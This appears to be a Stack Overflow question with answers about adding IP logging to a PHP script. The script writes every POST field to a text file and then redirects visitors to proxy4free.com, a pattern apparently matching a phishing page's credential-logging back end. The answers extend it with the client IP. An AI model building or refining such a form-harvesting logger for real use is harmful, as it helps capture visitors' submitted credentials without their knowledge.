# How to log IP address in text file

Tags: php, ip

```
<?php
header ('Location: http://proxy4free.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
```

This is my code currently i'm practicing and i would like to know how to log ip address in text file with PHP. I have no idea, but made attempts.

Comment: what results are you getting now, compared to what you're looking for? We don't know if your POSTs have value; do they? Is something being written to that file?

Comment: `"but made attempts"` - What attempts have you made?  What were the results of those attempts?

Comment: 2 counter questions; zero response; I'm out. [This is a comment](https://meta.stackoverflow.com/questions/358600/lets-send-new-users-off-to-see-the-wizard#comment526922_358600) in a [meta post](https://meta.stackoverflow.com/q/358600/1415724) that was created for posts just like this.

Comment: Let the OP have time to respond.

Comment: `header ('Location` will make the browser leave this script, i dont know why it would be in there at the top

Comment: @nogad No it doesn't, it makes the browser redirect to that URL when it gets the response from the script.

Comment: `$_SERVER['REMOTE_IP']` contains the client IP. Add that to the log message.

Comment: And after adding $_SERVER['REMOTE_IP'], move the header call to the line prior to "exit".

Answer (score 0):

```
<?php

$ip = $_SERVER['REMOTE_ADDR']; //get supposed IP

$handle = fopen("log.txt", "a"); //open log file

foreach($_POST as $variable => $value) { //loop through POST vars
   fwrite($handle, $variable . "+" . $value . "\r\n");
}
fwrite($handle, "IP: $ip \r\n \r\n");
fclose($handle);

header ('Location: http://proxy4free.com');
exit;
```

Note that file_put_contents is a wrapper around fopen/fwrite/fclose and will simplify your code (although I've not benchmarked it to see if it's slower, as you're writing multiple lines ... of course, you could just concatenate to one string and write all-at-once).  You might wish to try that.

Your header() call should be reserved until AFTER PHP's had time to write your log, and then followed by an "exit" as you'd done previously.

Security hasn't been addressed here at all.  If someone posted something unexpected, they might do all manner of mischief (just as an example, a huge POST var might fill up precious disk space your server must have to run --- and there might be **more** nefarious stuff too).  Consider using an input filter for each of those $_POST vars at a bare minimum (http://php.net/filter_input).  If you know what you're expecting from them, do something further (intval, preg_match testing, etc.)

Comment: 2601:780:c200:d03d:5811:f486:ffe9:a9b5? Why did this happen @Kevin_Kinsey

Comment: @COkelss thats an IPv6 address

Comment: oh! @nogad my bad

Answer (score 0):

```
<?php

$ip = $_SERVER['REMOTE_ADDR']; //get supposed IP

$handle = fopen("log.txt", "a"); //open log file

foreach($_POST as $variable => $value) { //loop through POST vars
fwrite($handle, $variable . "+" . $value . "\r\n");
}
fwrite($handle, "IP: $ip \r\n \r\n");
fclose($handle);

header ('Location: http://proxy4free.com');
exit;
```